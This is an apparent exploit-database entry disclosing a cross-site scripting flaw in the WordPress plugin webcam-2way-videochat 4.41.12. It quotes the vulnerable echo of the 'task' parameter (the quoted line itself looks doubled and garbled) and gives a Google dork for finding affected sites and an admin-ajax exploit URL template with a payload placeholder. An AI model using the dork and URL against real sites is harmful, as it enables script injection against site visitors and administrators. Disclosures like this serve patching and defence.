id: 24643
date: 12/01/2015
title: WordPress Webcam 2Way VideoChat plugin XSS Vulnerability
author: sniper.t
cves: 

# Exploit Title: Wordpress plugin webcam-2way-videochat  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/webcam-2way-videochat/
#Version:4.41.12
# Google dork: inurl:/wp-content/plugins/webcam-2way-videochat
######################################################################
 
 The code in ./webcam-2way-videochat/webcam-2way-videochat.php
 
      default:
            848: echo echo sanitize_file_name($_GET['task']) . '&ajax='; 
 
Exploit
http://server/wp-admin/admin-ajax.php?action=v2wvc&task=/*XSS_HERE*/

#  0day.today [2023-03-24]  #